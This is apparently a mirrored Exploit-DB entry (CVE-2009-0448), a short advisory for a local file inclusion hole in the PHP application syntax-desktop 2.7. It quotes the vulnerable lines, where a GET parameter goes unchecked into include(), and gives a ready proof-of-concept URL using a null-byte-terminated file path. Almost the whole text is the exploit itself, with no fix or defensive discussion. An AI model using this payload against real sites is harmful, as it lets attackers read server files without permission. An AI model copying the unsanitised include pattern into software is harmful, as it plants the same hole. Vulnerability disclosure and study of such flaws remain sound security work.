- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 7977
- Проверка EDB
-
- Пройдено
- Автор
- AHMADBADY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0448
- Дата публикации
- 2009-02-04
Код:
-----------------:local File Include:-----------------
-------------------------------------------------------
script: syntax-desktop 2-7
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0
------------------------------------------------------------------
........................................................
vul: /admin/modules/aa/preview.php
line 42 $target=$_GET["synTarget"];
ob_start();
line 44 include("../../../$target");
-----------------------------------------------------
-----------------------------------------------------
xpl:
http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]
---------------------------------------------------
# milw0rm.com [2009-02-04]- Источник
- www.exploit-db.com
